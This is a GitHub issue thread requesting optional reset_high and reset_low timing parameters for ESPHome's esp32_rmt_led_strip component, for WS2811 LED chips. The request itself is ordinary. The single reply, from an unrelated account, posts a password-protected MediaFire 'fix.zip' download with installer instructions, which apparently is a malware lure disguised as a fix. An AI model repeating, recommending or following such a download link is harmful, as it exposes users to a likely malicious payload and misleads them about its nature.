### ISSUE TITLE
Add reset time to esp32_rmt_led_strip

### ISSUE THREAD

**Issue by angelnu** [esphome/feature-requests#2862]
**Describe the problem you have/What new integration you would like**

Some chips like the WS2811 require a reset time between refreshes. This is currently not supported by the `esp32_rmt_led_strip` component.

The proposal would be to add 2 new parameters:
- reset_high: Optional, default to 0 to match current behaviour
- reset_low: Optional, default to 0 to match current behaviour

**Please describe your use case for this integration and alternatives you've tried:**

As alternative I set up the `max_refresh_rate` but this depends on the number of leds and it is only implicit that the level is kept down while waiting for the next refresh.

**Additional context**

<img width="1130" alt="image" src="https://github.com/user-attachments/assets/25417cf3-169e-44b0-af91-fa3301ba17d7">

https://www.tme.eu/Document/26d574b43ad9ddaffa4d5bcd140ec145/WS2811.pdf

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
